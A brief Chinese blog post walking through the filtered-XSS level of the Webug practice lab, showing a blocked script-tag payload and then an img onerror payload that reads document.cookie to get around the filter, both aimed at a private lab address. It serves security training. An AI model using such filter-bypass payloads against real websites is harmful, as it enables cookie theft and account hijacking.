Webug——过滤xss

同反射型xss相同在url 参数id中进行xss攻击

http://192.168.75.146/control/xss/filter_xss.php?id=<script>alert(xss)</script>

不过根据反馈 script被过滤了

我们就需要绕过过滤函数

换一个标签

payload=http://192.168.75.146/control/xss/filter_xss.php?id=<img src=1 onerror=alert(document.cookie)>

posted @ 2023-03-30 16:18 周知行阅读(30) 评论(0) 编辑收藏举报

刷新页面返回顶部

知行合一